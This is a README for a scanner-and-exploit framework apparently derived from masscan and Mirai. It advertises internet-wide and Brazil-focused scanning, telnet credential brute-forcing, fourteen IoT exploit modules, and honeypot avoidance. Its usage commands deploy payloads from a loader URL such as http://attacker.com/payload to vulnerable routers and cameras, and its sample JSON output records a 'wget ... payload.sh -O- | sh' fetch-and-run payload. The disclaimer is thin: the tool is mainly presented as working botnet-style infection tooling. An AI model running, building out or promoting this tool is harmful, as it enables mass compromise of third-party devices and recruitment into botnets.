A high-performance network scanner and exploit framework capable of scanning millions of IP addresses per second with built-in vulnerability detection and exploitation capabilities.
This tool is for educational and authorized security testing purposes only. Unauthorized scanning of networks or systems you do not own is illegal in most jurisdictions. Always obtain written permission before scanning any network. The authors assume no liability for misuse of this software.
- High-speed scanning: Up to millions of packets per second using PF_PACKET raw sockets
- BlackRock shuffle: Perfect bijective permutation ensures complete coverage without duplicates
- Multi-threaded: Scalable sender/receiver/exploit worker threads
- Honeypot detection: 512MB bitmap for tracking known honeypots and dynamic detection
- 14 exploit modules: Covers common IoT/network device vulnerabilities
- Global routable ranges: Built-in CIDR lists for scanning internet-facing devices
- Telnet brute-force: XOR-obfuscated credential list (Mirai-style)
- Dual output: TXT and JSON format results
- Rate limiting: Configurable PPS or bandwidth limits
- UDP/TCP support: SYN scan and UDP probe support
| Exploit | CVE/ID | Target Devices | Type |
|---|---|---|---|
| TP-Link | CVE-2023-1389 | TP-Link routers | RCE |
| Hikvision | CVE-2021-36260 | Hikvision cameras/NVRs | Command Injection |
| D-Link | CVE-2019-16920 | D-Link routers | Command Injection |
| Netgear | CVE-2020-35590 | Netgear routers | RCE |
| Zyxel | CVE-2020-9054 | Zyxel routers | RCE |
| Realtek | CVE-2014-8361 | Realtek UPnP devices | Command Injection |
| Cisco | CVE-2019-1663 | Cisco RV series routers | Buffer Overflow |
| GoAhead | CVE-2017-8225 | GoAhead web servers | Auth Bypass |
| MVPower | Backdoor | MVPower DVRs | Command Execution |
| Vacron | Vacron-NVR-RCE | Vacron NVRs | Command Injection |
| DVR-Hi3520 | XML NTP | Hi3520-based DVRs | XML Injection |
| Zhone | Zhone-RCE | Zhone routers | Command Injection |
| Fiber/GPON | Boa 0.93.15 | Fiber routers | Command Injection |
| Next.js | CVE-2025-55182/66478 | Next.js applications | Prototype Pollution RCE |
| Telnet | Brute-force | Various IoT devices | Credential Brute |
- OS: Ubuntu 18.04+ or Debian-based Linux
- Kernel: 3.14+ (for PACKET_QDISC_BYPASS support)
- CPU: Multi-core (more cores = better performance)
- RAM: Minimum 1GB (2GB+ recommended)
- Network: Gigabit NIC for high-speed scanning
- Root privileges: Required for raw packet operations
sudo apt update
sudo apt install -y build-essential git
sudo apt install -y linux-headers-$(uname -r)
2. Clone and Build
bash
# Clone the repository
git clone https://github.com/your-repo/ultra-scanner.git
cd ultra-scanner
# Build with standard options
make
# For PF_RING Zero-Copy support (optional, requires PF_RING)
# make USE_PFRING_ZC=1 PFRING_DIR=/opt/pfring
# For debug build
# make DEBUG=1
# For static build
# make STATIC=1
# Strip binary (reduces size)
make strip
# Install to /usr/local/bin (optional)
sudo make install
3. Verify Build
bash
./ultra_scanner -h
You should see the help message with all available options.
Quick Start
Basic Scan (Local Network)
bash
# Scan your local network for open ports 80 and 443
sudo ./ultra_scanner -t 192.168.1.0/24 -p "80,443" -r 10000 -v
Global Internet Scan (Use Responsibly!)
bash
# Scan global routable ranges for common IoT ports
sudo ./ultra_scanner --global -p "23,80,443,8080" -r 50000 -v
Scan with Exploitation
bash
# Deploy a payload to vulnerable devices
sudo ./ultra_scanner -t 10.0.0.0/24 \
-l http://your-server.com/payload.sh \
-W 64 \
-v
Brazil ASN Focus
bash
# Target Brazilian IP ranges (useful for ISP routers)
sudo ./ultra_scanner --br -p "23,80,443" -r 100000 -v
UDP Scan
bash
# UDP scan with custom probe
sudo ./ultra_scanner -t 192.168.1.0/24 -M udp -r 10000 -v
Dry Run (No Packets Sent)
bash
# See what would be scanned without actually sending packets
sudo ./ultra_scanner --global --dump-ips > ips.txt
Command Line Options
Targeting
Option Description Example
-t <cidr> Target CIDR range -t 192.168.1.0/24
--global Use built-in global routable ranges --global
--br Use Brazil ASN ranges --br
-w <file> Whitelist file (CIDRs) -w allow.txt
-b <file> Blacklist file (CIDRs) -b block.txt
--dump-ips Print IPs to scan and exit --dump-ips
Scan Configuration
Option Description Example
-p <ports> Ports to scan -p "80,443,8080-8090"
-r <pps> Packets per second -r 100000
-B <bps> Bandwidth limit -B 100M
-M <tcp|udp> Scan method -M tcp
-i <iface> Network interface -i eth0
-S <ip> Source IP -S 192.168.1.100
-G <mac> Gateway MAC -G 00:11:22:33:44:55
-T <n> Sender threads -T 4
-R <n> Receiver threads -R 2
-c <secs> Cooldown after scan -c 10
-d Dry run (no packets) -d
--qdisc-bypass Bypass kernel qdisc --qdisc-bypass
Exploitation
Option Description Example
-l <url> Loader URL -l http://server/payload.sh
-W <n> Exploit worker threads -W 256
--scan-only Detect open ports only --scan-only
Output
Option Description Example
-o <file> TXT output file -o results.txt
-j <file> JSON output file -j results.json
-v Verbose mode -v
-q Quiet mode -q
-h Help -h
Performance Tuning
System Tuning for High-Speed Scanning
bash
# Increase socket buffer sizes
sudo sysctl -w net.core.rmem_max=26214400
sudo sysctl -w net.core.wmem_max=26214400
sudo sysctl -w net.core.rmem_default=26214400
sudo sysctl -w net.core.wmem_default=26214400
# Disable reverse path filtering
sudo sysctl -w net.ipv4.conf.all.rp_filter=0
sudo sysctl -w net.ipv4.conf.default.rp_filter=0
# Increase network device backlog
sudo sysctl -w net.core.netdev_max_backlog=50000
# Disable TCP timestamps (reduces overhead)
sudo sysctl -w net.ipv4.tcp_timestamps=0
# Make changes permanent (add to /etc/sysctl.conf)
Rate Recommendations
Network Type Recommended PPS Notes
Home/Lab 5,000 - 20,000 Safe for home networks
Office/Corporate 20,000 - 50,000 Monitor network load
Datacenter (1Gbps) 100,000 - 500,000 May need tuning
Datacenter (10Gbps) 500,000 - 2,000,000 Requires PF_RING
CPU Affinity
The scanner automatically pins threads to CPU cores. For optimal performance:
More sender threads = more cores
1 receiver thread is usually sufficient
Exploit workers can be scaled based on targets
Output Formats
TXT Output Example
text
2025-03-31 10:15:23 | 192.168.1.100:80 | TP-Link | CVE-2023-1389 | TP-Link locale RCE | HTTP 200 | VERIFIED | 342ms
2025-03-31 10:15:24 | 192.168.1.101:23 | Telnet | TELNET-BRUTE | Telnet RCE via credential brute-force | VERIFIED | 156ms
JSON Output Example
json
[
{
"timestamp": "2025-03-31 10:15:23",
"ip": "192.168.1.100",
"port": "80",
"device": "TP-Link",
"cve": "CVE-2023-1389",
"method": "TP-Link locale RCE",
"payload": "wget http://server/payload.sh -O- | sh",
"status_code": 200,
"success": true,
"verified": true,
"is_honeypot": false,
"time_ms": 342,
"response_preview": "HTTP 200"
}
]
Honeypot Detection
The scanner uses multiple methods to avoid honeypots:
Static CIDR list: Known honeypot IP ranges (MHN, T-Pot, DShield)
Dynamic detection: HTTP headers and body patterns
Bitmap tracking: 512MB bitmap for marking identified honeypots
Telnet behavior: If any credential works, marks as honeypot
Architecture
text
┌─────────────────────────────────────────────────────────┐
│ Main Thread │
│ - Parse arguments │
│ - Initialize subsystems │
│ - Setup BlackRock permutation │
└────────────┬────────────────────────────────┬───────────┘
│ │
┌────────▼────────┐ ┌────────▼────────┐
│ Sender Threads │ │ Receiver Threads│
│ (PF_PACKET) │ │ (PF_PACKET) │
│ - BlackRock │ │ - SYN+ACK │
│ - Rate limit │───Packets───▶│ - Cookie check │
│ - UDP/TCP │ │ - De-dup │
└─────────────────┘ └────────┬────────┘
│
┌─────────▼─────────┐
│ Target Queue │
│ (MPMC ring) │
└─────────┬─────────┘
│
┌─────────▼─────────┐
│ Exploit Workers │
│ - Telnet brute │
│ - 14 exploit mods │
└─────────┬─────────┘
│
┌─────────▼─────────┐
│ Output Writer │
│ (TXT + JSON) │
└───────────────────┘
Common Use Cases
1. Vulnerability Assessment
bash
# Scan corporate network for vulnerable IoT devices
sudo ./ultra_scanner -t 10.0.0.0/8 -p "23,80,443,8080,8443" -r 20000 -v
2. Penetration Testing
bash
# Full scan with exploitation
sudo ./ultra_scanner -t 192.168.1.0/24 \
-l http://attacker.com/payload \
-W 128 \
-o vuln_hosts.txt \
-j vuln_hosts.json \
-v
3. Internet Census (Research Only)
bash
# Scan global routable ranges for open SSH
sudo ./ultra_scanner --global -p "22" -r 100000 -v
4. ISP Router Assessment
bash
# Focus on Brazil ranges for router vulnerabilities
sudo ./ultra_scanner --br -p "23,80,443,7547,37215" -r 50000 -v
Troubleshooting
Error: "Cannot determine source IP"
bash
# Specify interface and IP manually
sudo ./ultra_scanner -i eth0 -S 192.168.1.100 -t 10.0.0.0/24
Error: "Interface not found"
bash
# List available interfaces
ip link show
# Use correct interface name (ens33, enp0s3, etc.)
sudo ./ultra_scanner -i ens33
Low packet send rate
bash
# Increase sender threads
sudo ./ultra_scanner -T 8 -r 100000
# Enable QDISC bypass (if supported)
sudo ./ultra_scanner --qdisc-bypass -r 200000
Segmentation fault
bash
# Compile with debug symbols
make clean && make DEBUG=1
# Run with address sanitizer
./ultra_scanner [options]
No responses received
bash
# Check that you're scanning reachable IPs
# Verify source MAC is correct
# Check if gateway MAC is being resolved
# Try with verbose mode to see what's happening
sudo ./ultra_scanner -t 192.168.1.0/24 -v
Security Considerations
Never scan without permission - This is illegal in most jurisdictions
Use on networks you own or have written authorization for
The loader URL should host your own payloads - Don't use third-party URLs
Logs may contain sensitive information - Handle output files securely
Honeypots may log your activity - Be aware of detection capabilities
High-rate scanning may trigger IDS/IPS - Use appropriate rates for the environment
Advanced Configuration
Custom Probe Payload (UDP)
Modify config.h to add a custom UDP probe:
c
// In config.h, add probe payload
uint8_t probe_payload[] = "GET / HTTP/1.0\r\n\r\n";
size_t probe_payload_len = sizeof(probe_payload) - 1;
Add Custom Exploit Module
Add detection function in exploits.c
Add exploit function in exploits.c
Register in main.c register_exploits()
Add to exploit table
Modify Port List
Edit DEFAULT_PORTS in config.h:
c
#define DEFAULT_PORTS "80,443,8080,8443,23,2323,22"
Building with PF_RING
For maximum performance (2M+ pps):
bash
# Install PF_RING (from https://github.com/ntop/PF_RING)
cd /opt
git clone https://github.com/ntop/PF_RING.git
cd PF_RING
make
cd kernel
sudo make install
sudo depmod -a
sudo modprobe pf_ring
# Build scanner with PF_RING
make USE_PFRING_ZC=1 PFRING_DIR=/opt/PF_RING
License
This project is for educational purposes only. Use at your own risk.Acknowledgments Based on masscan by Robert David Graham
BlackRock2 implementation from masscan
Telnet brute-force adapted from Mirai scanner
Exploit modules from various security research
Support For issues or questions:
Check the troubleshooting section
Run with -v for verbose output
Compile with DEBUG=1 for detailed debugging